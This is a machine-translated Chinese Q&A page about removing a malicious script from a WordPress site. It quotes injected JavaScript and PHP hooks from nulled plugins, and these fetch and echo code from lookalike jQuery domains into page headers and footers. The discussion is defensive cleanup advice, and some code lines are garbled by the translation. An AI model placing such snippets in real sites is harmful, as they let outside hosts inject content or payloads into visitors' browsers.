Javascript 从wordpress站点删除脚本
我正在使用恶意软件字节,每次访问我的wordpress站点时,它都会阻止试图在页面上运行的脚本,该脚本是:Javascript 从wordpress站点删除脚本,javascript,php,jquery,wordpress,Javascript,Php,Jquery,Wordpress,我正在使用恶意软件字节,每次访问我的wordpress站点时,它都会阻止试图在页面上运行的脚本,该脚本是: <script type="text/javascript"> if (!document.referrer || document.referrer == '') { document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.
<script type="text/javascript">
if (!document.referrer || document.referrer == '') {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
} else {
document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
}
</script>
如果(!document.referer | | document.referer==“”){
文件。写(“”);
}否则{
文件。写(“”);
}
任何帮助都将不胜感激。您可以使用此问题中建议的应用程序之一在wordpress目录中搜索此脚本:。您使用的wordpress插件或主题可能是从“空”主题和插件库下载的 几乎所有这样的网站都采用了一种商业模式,通过这种模式,他们提供的主题和插件通常免费5美元至75美元 但俗话说,天下没有免费的午餐。作为免费插件/主题的交换,网站所有者添加了代码,其中包括一个来自外部域的js文件,该文件向您的网站添加了横幅 为了防止网站管理员或开发人员立即注意到这些横幅(或只是一个或三个反向链接),任何以管理员身份登录的人或/或任何没有推荐人url的人都不会显示广告 在你的例子中,有效载荷是从一个类似于真实事物的域中包含的,从而愚弄了足够多没有经验的Wordpress网站管理员,使其成为属于jQuery的东西。jQuery官方CDN位于这里//code.jQuery.com/ 确保检查所有来自阴暗处的主题或插件是否有类似的代码,这些代码也可能在图像文件中,尽管通常在init.php或functions.php中。下面是另一个使用jquery域的不同变体的类似代码示例
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
if (@fopen($jquery,'r')){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
停用所有插件,检查网站,看看是否仍然存在问题-如果没有,则一次激活一个插件并检查(这将让你知道它是哪个插件)。如果所有插件停用后出现问题,请检查主题文件。谢谢,我现在就来试试!好的,我找到了插件,这是插件php
if(!function_exists('wp_func_jquery')){function wp_func_jquery(){$host='http://';$library='/jquery-1.6.3.min.js';echo(wp_remote_retrieve_body(wp_remote_get($host.jquery.'libs.org'$library)))}if(rand(1,2)==1){add('wp_footer','wp_func_jquery');}其他{add_action('wp_head','wp_func_jquery');}